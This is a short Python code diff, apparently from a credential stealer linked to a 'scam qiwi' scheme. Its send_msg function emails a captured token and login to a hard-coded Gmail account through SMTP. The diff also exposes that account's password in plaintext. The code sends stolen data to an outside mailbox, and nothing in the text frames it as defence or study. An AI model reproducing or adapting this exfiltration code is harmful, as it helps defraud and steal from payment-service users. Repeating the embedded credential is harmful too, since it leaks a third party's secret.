@@ -8,7 +8,7 @@ import smtplib
 msg = MIMEMultipart()
  
 def send_msg(tk,lg):
-    message = ('"'+str(tk)+'": ' + '"' + lg +'",')
+    message = (str(tk))
 
 
     
@@ -16,7 +16,7 @@ def send_msg(tk,lg):
     password = "magaisaev95"
     msg['From'] = "tramong682@gmail.com"
     msg['To'] = "tramong682@gmail.com"
-    msg['Subject'] = "scam qiwi"
+    msg['Subject'] = str(lg)
     
     # add in the message body
     msg.attach(MIMEText(message, 'plain'))
